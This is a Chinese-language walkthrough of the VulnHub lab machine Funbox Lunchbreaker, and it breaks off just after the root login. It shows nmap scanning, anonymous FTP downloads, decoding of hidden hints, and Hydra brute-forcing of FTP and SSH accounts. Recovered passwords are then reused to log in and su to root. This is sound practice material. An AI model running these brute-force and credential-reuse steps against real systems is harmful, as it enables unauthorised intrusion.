1、环境介绍
靶场介绍:https://www.vulnhub.com/entry/funbox-lunchbreaker,700/
靶场下载:https://download.vulnhub.com/funbox/FunboxLunchbreaker.ova
靶场难度:简单
发布日期:2021年05月22日
文件大小:1.6 GB
靶场作者:0815R2d2
靶场系列:Funbox
靶场描述:这是一个初学者的盒子,可以在午休时打开。这在VirtualBox而不是VMware中更有效
打靶耗时:4+小时,技术上没有什么难度,就是太绕了。。。来来回回就那么两条命令。。。不过的确提供了一些很特殊的思路。
打靶关键: FTP 操作 与 密码爆破
2、主机发现与端口扫描
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:cb:7e:f5, IPv4: 192.168.56.3
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 3a:f9:d3:90:a4:64 (Unknown: locally administered)
192.168.56.46 08:00:27:3e:67:06 PCS Systemtechnik GmbH
2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.310 seconds (110.82 hosts/sec). 2 responded
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧
└─# nmap -T4 -sC -sV -p- -A --min-rate=1000 192.168.56.46
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-30 23:04 EST
Nmap scan report for 192.168.56.46
Host is up (0.00060s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 633 May 22 2021 supers3cr3t
|_drwxr-xr-x 6 1006 1006 4096 May 22 2021 wordpress
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 1d:3d:bf:5a:e1:9f:bb:31:85:34:94:24:cf:0c:04:20 (RSA)
| 256 3b:e1:5c:97:5a:93:1d:9c:d5:02:e5:d8:15:a7:92:ea (ECDSA)
|_ 256 d6:f2:e3:da:7e:d7:3f:94:7e:3b:5d:bc:ef:ee:49:63 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:3E:67:06 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.60 ms 192.168.56.46
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.09 seconds
3、端口访问
3.1、21端口 - FTP
- 根据 FTP 目录分析,
可能存在 FTP 上传 WebShell 的可能性 - 也可能存在
密码爆破,看后面能不能找到用户名
3.1.1、FTP 文件下载
- 下载文件「supers3cr3t」「.s3cr3t」
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧
└─# ftp 192.168.56.46
Connected to 192.168.56.46.
220 (vsFTPd 3.0.3)
Name (192.168.56.46:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||35135|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 118 4096 May 22 2021 .
drwxr-xr-x 3 0 118 4096 May 22 2021 ..
-rw-r--r-- 1 0 0 233 May 22 2021 .s3cr3t
-rw-r--r-- 1 0 0 633 May 22 2021 supers3cr3t
drwxr-xr-x 6 1006 1006 4096 May 22 2021 wordpress
226 Directory send OK.
ftp> lcd /root/soft/hack
Local directory now: /root/soft/hack
ftp> get supers3cr3t
local: supers3cr3t remote: supers3cr3t
229 Entering Extended Passive Mode (|||35096|)
150 Opening BINARY mode data connection for supers3cr3t (633 bytes).
100% |**************************************************************| 633 594.38 KiB/s 00:00 ETA
226 Transfer complete.
633 bytes received in 00:00 (209.33 KiB/s)
ftp> get .s3cr3t
229 Entering Extended Passive Mode (|||42850|)
150 Opening BINARY mode data connection for .s3cr3t (233 bytes).
100% |**************************************************************| 233 473.05 KiB/s 00:00 ETA
226 Transfer complete.
233 bytes received in 00:00 (183.20 KiB/s)
ftp> exit
221 Goodbye.
- 下载文件夹「wordpress」
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧
└─# cd ~/soft/hack
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# wget -r -np -nH ftp://192.168.56.46/wordpress
--2023-12-01 00:37:23-- ftp://192.168.56.46/wordpress
=> “.listing”
正在连接 192.168.56.46:21... 已连接。
正在以 anonymous 登录 ... 登录成功!
==> SYST ... 完成。 ==> PWD ... 完成。
==> TYPE I ... 完成。 ==> 不需要 CWD。
==> PASV ... 完成。 ==> LIST ... 完成。
......
下载完毕 --2023-12-01 00:37:32--
总用时:9.3s
下载了:1566 个文件,1.9s (21.6 MB/s) 中的 41M
3.1.2、「supers3cr3t」「.s3cr3t」文件读取 与 解码
- 获取提示(不像有用的样子):
深入大自然,你就会更好地理解一切。如果一千个太阳的光辉/立即绽放到天空中/那就像/强者的光辉,我将成为死亡,世界的破碎者
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# ls
supers3cr3t wordpress
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# cat supers3cr3t
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>++++++.>+++++++++++..----.<<++.>>-------.+..+++++++++++.<<.>>-------.+++++.++++++.-----.<<.>>-.-------------.+++++++++++++++++++.+.---.-------------.<<.>>----.+++++++++++++.----------.<<.>>++++++++++++++++.------------.---.+++++++++.<<.>>+++++++++++.----------.++++++.<<.>>++.--------------.+++..<<.>>+++++++++.-------.----------.+.+++++++++++++.+.+.-------------------.+++++++++++++.----------.<<.>>+.+++++++++++++++++.-----------------.+++++++++++++.+++++++.-----.------------.+.+++++.-------.<<.>>-----.+++.+++++++++++++++..---------------.+++++++++++++.<<++++++++++++++.------------.
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# cat supers3cr3t | python ../Brainfuck解码.py
解码前:++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>++++++.>+++++++++++..----.<<++.>>-------.+..+++++++++++.<<.>>-------.+++++.++++++.-----.<<.>>-.-------------.+++++++++++++++++++.+.---.-------------.<<.>>----.+++++++++++++.----------.<<.>>++++++++++++++++.------------.---.+++++++++.<<.>>+++++++++++.----------.++++++.<<.>>++.--------------.+++..<<.>>+++++++++.-------.----------.+.+++++++++++++.+.+.-------------------.+++++++++++++.----------.<<.>>+.+++++++++++++++++.-----------------.+++++++++++++.+++++++.-----.------------.+.+++++.-------.<<.>>-----.+++.+++++++++++++++..---------------.+++++++++++++.<<++++++++++++++.------------.
解码后:Look deep into nature and then you will understand everything better."
翻 译:深入大自然,你就会更好地理解一切。
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# cat .s3cr3t
SWYgdGhlIHJhZGlhbmNlIG9mIGEgdGhvdXNhbmQgc3VucyAvIHdlcmUgdG8gYnVyc3QgYXQgb25jZSBpbnRvIHRoZSBza3kgLyB0aGF0IHdvdWxkIGJlIGxpa2UgLyB0aGUgc3BsZW5kb3Igb2YgdGhlIE1pZ2h0eSBPbmUgYW5kIEkgYW0gYmVjb21lIERlYXRoLCB0aGUgc2hhdHRlcmVyIG9mIHdvcmxkcw==
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# cat .s3cr3t | base64 -d
If the radiance of a thousand suns / were to burst at once into the sky / that would be like / the splendor of the Mighty One and I am become Death, the shatterer of worlds
如果一千个太阳的光辉/立即绽放到天空中/那就像/强者的光辉,我将成为死亡,世界的破碎者
3.1.3、「wordpress」文件夹内容搜索
- 数据库密码搜索
(base) ┌──(root㉿kali)-[~/soft/hack/wordpress] (๑•̀ㅂ•́)و✧
└─# grep -ri -E 'DB_PASSWORD' *
wp-admin/setup-config.php: define( 'DB_PASSWORD', $pwd );
wp-admin/setup-config.php: case 'DB_PASSWORD':
wp-config.php:define( 'DB_PASSWORD', 'JuZhRbNNk.()' );
wp-config-sample.php:define( 'DB_PASSWORD', 'passwort_hier_einfuegen' );
wp-includes/load.php: $dbpassword = defined( 'DB_PASSWORD' ) ? DB_PASSWORD : '';
- 获取了两个数据库用户密码
10.10.10.12:不是本地IP,可能存在容器
(base) ┌──(root㉿kali)-[~/soft/hack/wordpress] (๑•̀ㅂ•́)و✧
└─# cat wp-config.php
<?php
......
define( 'DB_NAME', 'wpdb' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'JuZhRbNNk.()' );
define( 'DB_HOST', '10.10.10.12' );
define( 'DB_CHARSET', 'utf8' );
define('DB_COLLATE', '');
......
(base) ┌──(root㉿kali)-[~/soft/hack/wordpress] (๑•̀ㅂ•́)و✧
└─# cat wp-config-sample.php
<?php
......
define( 'DB_NAME', 'datenbankname_hier_einfuegen' );
define( 'DB_USER', 'benutzername_hier_einfuegen' );
define( 'DB_PASSWORD', 'passwort_hier_einfuegen' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8' );
define('DB_COLLATE', '');
......
3.2、22端口 - SSH
- 初步登录查看是否有可用提示
(base) ┌──(root㉿kali)-[~/soft/hack/wordpress] (๑•̀ㅂ•́)و✧
└─# ssh 192.168.56.46
The authenticity of host '192.168.56.46 (192.168.56.46)' can·t be established.
ED25519 key fingerprint is SHA256:A887jwxDkjOcXiGyfxtQS9gU3vV0CwSl3h7KaSGiOjY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.46' (ED25519) to the list of known hosts.
root@192.168.56.46's password:
3.3、80端口 - Web
- 获取两个信息
- 可能是用户名:
j.miller、jane、miller - 可能是邮箱:
jane@funbox8.ctf
- 可能是用户名:
- 背景图片:可能存在
隐写,但是优先级不高,如果后续没有线索,返回来分析图片
<!-- webdesign by j.miller [jane@funbox8.ctf] -->
4、目录扫描
- robots.txt 中的的目录名很有意思:
dirb、gobuster:都是目录扫描工具etc:Linux系统配置文件所在的目录WYSIWYG:what you see is what you get(所见即所得)
# 基础小字典,初扫摸底
dirb http://192.168.56.46
# 较全面 conda activate py37
dirsearch -u http://192.168.56.46 -t 64 -e *
# 较全面 Plus conda activate py39
cd ~/soft/dirmap ; python3 dirmap.py -i http://192.168.56.46 -lcf
- http://192.168.56.46/index.html
- http://192.168.56.46/robots.txt
4.1、「robots」目录扫描(干干净净,啥都没。。。)
- 原来「所见即所得」是这个意思,告诉我们不用做目录扫描。。。
- 不去亲自扫一遍,谁知道会不会是干扰信息呢。(╯°□°)╯︵┻━┻
gobuster dir -u http://192.168.56.46/dirb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
gobuster dir -u http://192.168.56.46/gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
gobuster dir -u http://192.168.56.46/etc -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
gobuster dir -u http://192.168.56.46/WYSIWYG -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
5、好吧,开始解析图片。。。
- 图片下载
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# wget http://192.168.56.46/image.jpg
--2023-12-01 02:17:30-- http://192.168.56.46/image.jpg
正在连接 192.168.56.46:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:7053571 (6.7M) [image/jpeg]
正在保存至: “image.jpg”
image.jpg 100%[=======================================>] 6.73M --.-KB/s 用时 0.07s
2023-12-01 02:17:30 (99.5 MB/s) - 已保存 “image.jpg” [7053571/7053571])
5.1、本地图片解析
5.1.1、steghide 解析(失败)
- 查看图片信息(发现存在密码)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# steghide info image.jpg
"image.jpg":
format: jpeg
capacity: 376.0 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!
- 初次爆破密码(失败)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# stegseek image.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.59% (132.9 MB)
[!] error: Could not find a valid passphrase.
- 第二次种子爆破(失败)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# stegseek --seed image.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.99% (4294720000 seeds)
[!] error: Could not find a valid seed.
5.1.2、binwalk 解析(失败)
- 提取文件(失败)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# binwalk -e image.jpg --run-as=root
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, EXIF standard
12 0xC TIFF image data, little-endian offset of first image directory: 8
8566 0x2176 Copyright string: "Copyright (c) 1998 Hewlett-Packard Company"
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# ls
image.jpg reports supers3cr3t wordpress
5.1.3、foremost 解析(失败)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# foremost image.jpg
Processing: image.jpg
|*|
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# tree -a output
output
├── audit.txt
└── jpg
└── 00000000.jpg
2 directories, 2 files
5.2、在线图片解析(同样,啥也没看出来)
StegOnline
6、SSH 密码爆破(同步做 FTP 爆破)
- 当前(初步)没有什么信息好利用了,只剩下一个可能的用户名
jane了 - 如果依然不行,那就只能
更换不同字典,重新进行目录扫描,与密码爆破了
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# hydra -l jane -P /usr/share/wordlists/rockyou.txt -t 64 192.168.56.46 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-01 02:46:21
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://192.168.56.46:22/
[STATUS] 378.00 tries/min, 378 tries in 00:01h, 14344056 to do in 632:28h, 29 active
[STATUS] 218.00 tries/min, 654 tries in 00:03h, 14343785 to do in 1096:38h, 24 active
...... 失败,没有爆破出来
7、FTP 密码爆破
- 爆破出密码:login:
janepassword:password
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧
└─# hydra -l jane -P /usr/share/wordlists/rockyou.txt -t 64 192.168.56.46 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-01 02:56:18
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ftp://192.168.56.46:21/
[21][ftp] host: 192.168.56.46 login: jane password: password
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-01 02:56:24
7.1、下载文件
- FTP 当前的目录结构,像是 Linux 用户
/home的
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# ftp 192.168.56.46
Connected to 192.168.56.46.
220 (vsFTPd 3.0.3)
Name (192.168.56.46:root): jane
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||57051|)
150 Here comes the directory listing.
dr-x------ 3 1002 1002 4096 May 22 2021 .
drwxr-xr-x 6 0 0 4096 May 22 2021 ..
-rw-r--r-- 1 1002 1002 220 May 22 2021 .bash_logout
-rw-r--r-- 1 1002 1002 3771 May 22 2021 .bashrc
-rw-r--r-- 1 1002 1002 807 May 22 2021 .profile
drwxr-xr-x 2 1002 1002 4096 May 22 2021 backups
226 Directory send OK.
ftp> cd backups
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||44799|)
150 Here comes the directory listing.
drwxr-xr-x 2 1002 1002 4096 May 22 2021 .
dr-x------ 3 1002 1002 4096 May 22 2021 ..
-rw-r--r-- 1 1002 1002 59 May 22 2021 keys.txt
226 Directory send OK.
ftp> get keys.txt
local: keys.txt remote: keys.txt
229 Entering Extended Passive Mode (|||19248|)
150 Opening BINARY mode data connection for keys.txt (59 bytes).
100% |*********************************************************| 59 0.98 MiB/s 00:00 ETA
226 Transfer complete.
59 bytes received in 00:00 (45.72 KiB/s)
- 这个 keys.txt 目前不知道咋用,可能是什么密码吧
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# cat keys.txt
kJGgh-kiu65-zghku-76zzt-hgf56
llij8-fgzZ-rTzU1-ddfgz-i876S
7.2、发现像 /home,验证一下
- 果然。。。就是
ftp> ls -al
229 Entering Extended Passive Mode (|||32072|)
150 Here comes the directory listing.
dr-x------ 3 1002 1002 4096 May 22 2021 .
drwxr-xr-x 6 0 0 4096 May 22 2021 ..
-rw-r--r-- 1 1002 1002 220 May 22 2021 .bash_logout
-rw-r--r-- 1 1002 1002 3771 May 22 2021 .bashrc
-rw-r--r-- 1 1002 1002 807 May 22 2021 .profile
drwxr-xr-x 2 1002 1002 4096 May 22 2021 backups
226 Directory send OK.
ftp> pwd
Remote directory: /home/jane
ftp> cd ../
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||16839|)
150 Here comes the directory listing.
drwxr-xr-x 6 0 0 4096 May 22 2021 .
drwxr-xr-x 20 0 0 4096 May 22 2021 ..
dr-x------ 3 1002 1002 4096 May 22 2021 jane
dr-x------ 3 1001 1001 4096 May 22 2021 jim
dr-x------ 4 1000 1000 4096 May 22 2021 john
drwx------ 4 1003 1003 4096 May 22 2021 jules
226 Directory send OK.
7.3、jane 用户信息收集
- 没啥信息,就是知道了存在四个用户:
jane、jim、john、jules
ftp> cd jim
550 Failed to change directory.
ftp> cd john
550 Failed to change directory.
ftp> cd jules
550 Failed to change directory.
7.4、FTP 操作有限,尝试爆破另外三个用户密码
- login:
janepassword:password - login:
jimpassword:12345 - john 爆破失败
- login:
julespassword:sexylady
# 不建议这样合在一起爆破,如果中间有一个爆破不出来,都会等好长时间
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# cat user
jane
jim
john
jules
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# hydra -L user -P /usr/share/wordlists/rockyou.txt -t 64 192.168.56.46 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-01 03:34:43
[DATA] max 64 tasks per 1 server, overall 64 tasks, 57377596 login tries (l:4/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.56.46:21/
[21][ftp] host: 192.168.56.46 login: jane password: password
[21][ftp] host: 192.168.56.46 login: jim password: 12345
......(For a long, long time)
[21][ftp] host: 192.168.56.46 login: jules password: sexylady
7.5、FTP 登录 jim 用户
- 两个 SSH 相关文件都是空的
- 而且禁止上传文件
- 那这个用户的作用不是很大
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# ftp 192.168.56.46
Connected to 192.168.56.46.
220 (vsFTPd 3.0.3)
Name (192.168.56.46:root): jim
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||15289|)
150 Here comes the directory listing.
dr-x------ 3 1001 1001 4096 May 22 2021 .
drwxr-xr-x 6 0 0 4096 May 22 2021 ..
-rw-r--r-- 1 1001 1001 220 May 22 2021 .bash_logout
-rw-r--r-- 1 1001 1001 3771 May 22 2021 .bashrc
-rw-r--r-- 1 1001 1001 807 May 22 2021 .profile
dr-xr-xr-x 2 1001 1001 4096 May 22 2021 .ssh
226 Directory send OK.
ftp> cd .ssh
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||26295|)
150 Here comes the directory listing.
dr-xr-xr-x 2 1001 1001 4096 May 22 2021 .
dr-x------ 3 1001 1001 4096 May 22 2021 ..
-rw-r--r-- 1 1001 1001 0 May 22 2021 authorized_keys
-r-------- 1 1001 1001 0 May 22 2021 id_rsa
226 Directory send OK.
ftp> put passwd
local: passwd remote: passwd
229 Entering Extended Passive Mode (|||20802|)
550 Permission denied.
7.6、FTP 登录 jules 用户
- 发现了两个字典
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# ftp 192.168.56.46
Connected to 192.168.56.46.
220 (vsFTPd 3.0.3)
Name (192.168.56.46:root): jules
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||40874|)
150 Here comes the directory listing.
drwx------ 4 1003 1003 4096 May 22 2021 .
drwxr-xr-x 6 0 0 4096 May 22 2021 ..
drwx------ 2 1003 1003 4096 May 22 2021 .backups
-rw------- 1 1003 1003 10 May 22 2021 .bash_history
-rw-r--r-- 1 1003 1003 220 May 22 2021 .bash_logout
-rw-r--r-- 1 1003 1003 3771 May 22 2021 .bashrc
drwx------ 2 1003 1003 4096 May 22 2021 .cache
-rw-r--r-- 1 1003 1003 807 May 22 2021 .profile
226 Directory send OK.
ftp> cd .cache
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||63865|)
150 Here comes the directory listing.
drwx------ 2 1003 1003 4096 May 22 2021 .
drwx------ 4 1003 1003 4096 May 22 2021 ..
-rw-r--r-- 1 1003 1003 0 May 22 2021 motd.legal-displayed
226 Directory send OK.
ftp> cd ../
250 Directory successfully changed.
ftp> cd .backups
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||52228|)
150 Here comes the directory listing.
drwx------ 2 1003 1003 4096 May 22 2021 .
drwx------ 4 1003 1003 4096 May 22 2021 ..
-r-------- 1 1003 1003 139921517 May 22 2021 .bad-passwds
-r-------- 1 1003 1003 0 May 22 2021 .forbidden-passwds
-r-------- 1 1003 1003 562 May 22 2021 .good-passwd
-r-------- 1 1003 1003 0 May 22 2021 .very-bad-passwds
226 Directory send OK.
ftp> lpwd
Local directory: /root/soft/hack
ftp> mget .bad-passwds .good-passwd
mget .bad-passwds [anpqy?]?
229 Entering Extended Passive Mode (|||36078|)
150 Opening BINARY mode data connection for .bad-passwds (139921517 bytes).
100% |*********************************************************| 133 MiB 68.70 MiB/s 00:00 ETA
226 Transfer complete.
139921517 bytes received in 00:01 (68.67 MiB/s)
mget .good-passwd [anpqy?]?
229 Entering Extended Passive Mode (|||10353|)
150 Opening BINARY mode data connection for .good-passwd (562 bytes).
100% |*********************************************************| 562 417.04 KiB/s 00:00 ETA
226 Transfer complete.
562 bytes received in 00:00 (195.87 KiB/s)
7.7、重新爆破 john 用户
- login:
johnpassword:zhnmju!!!
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# hydra -l john -P .bad-passwds -t 64 192.168.56.46 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-01 11:14:25
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344400 login tries (l:1/p:14344400), ~224132 tries per task
[DATA] attacking ftp://192.168.56.46:21/
[21][ftp] host: 192.168.56.46 login: john password: zhnmju!!!
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 8 final worker threads did not complete until end.
[ERROR] 8 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-01 11:15:12
7.8、john 用户信息收集
- 获取提示:
Chance R00TPASSWD, because it's the same right now.机会R00TPASSWD,因为现在也一样root密码 可能与当前爆破出来的密码相同,大概率zhnmju!!!,毕竟其他密码都爆破过了
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# ftp 192.168.56.46
Connected to 192.168.56.46.
220 (vsFTPd 3.0.3)
Name (192.168.56.46:root): john
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||39099|)
150 Here comes the directory listing.
dr-x------ 4 1000 1000 4096 May 22 2021 .
drwxr-xr-x 6 0 0 4096 May 22 2021 ..
-rw-r--r-- 1 1000 1000 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 1000 1000 3771 Feb 25 2020 .bashrc
drwx------ 2 1000 1000 4096 May 22 2021 .cache
-rw-r--r-- 1 1000 1000 807 Feb 25 2020 .profile
drwx------ 2 1000 1000 4096 May 22 2021 .todo
226 Directory send OK.
ftp> cd .todo
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||11684|)
150 Here comes the directory listing.
drwx------ 2 1000 1000 4096 May 22 2021 .
dr-x------ 4 1000 1000 4096 May 22 2021 ..
-rwx------ 1 1000 1000 131 May 22 2021 todo.list
226 Directory send OK.
ftp> get todo.list
local: todo.list remote: todo.list
229 Entering Extended Passive Mode (|||36045|)
150 Opening BINARY mode data connection for todo.list (131 bytes).
100% |*********************************************************| 131 358.34 KiB/s 00:00 ETA
226 Transfer complete.
131 bytes received in 00:00 (88.59 KiB/s)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# cat todo.list
1. Install LAMP
2. Install MAIL-System
3. Install Firewall
4. Install Plesk
5. Chance R00TPASSWD, because it's the same right now.
8、尝试使用 FTP 密码登录 SSH
- login:
johnpassword:zhnmju!!! - login:
julespassword:sexylady
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# cat user
jane
jim
john
jules
root
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# cat passwd
password
12345
sexylady
zhnmju!!!
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# hydra -L user -P passwd -t 4 192.168.56.46 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-01 11:27:28
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 16 login tries (l:4/p:4), ~4 tries per task
[DATA] attacking ssh://192.168.56.46:22/
[22][ssh] host: 192.168.56.46 login: john password: zhnmju!!!
[22][ssh] host: 192.168.56.46 login: jules password: sexylady
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-01 11:27:50
8.1、SSH 登录 john 用户
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# ssh john@192.168.56.46
john@192.168.56.46's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-73-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri 01 Dec 2023 09:26:58 AM UTC
System load: 0.01 Processes: 160
Usage of /: 88.3% of 4.37GB Users logged in: 0
Memory usage: 12% IPv4 address for enp0s3: 192.168.56.46
Swap usage: 0%
=> / is using 88.3% of 4.37GB
64 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat May 22 16:03:57 2021 from 192.168.178.143
john@funbox8:~$
8.2、SSH 登录 jules 用户
略过
9、尝试切换 root 用户
root:zhnmju!!!
john@funbox8:~$ su root
Password:
root@funbox8:/home/john# cd ~
root@funbox8:~# ls -al
total 52
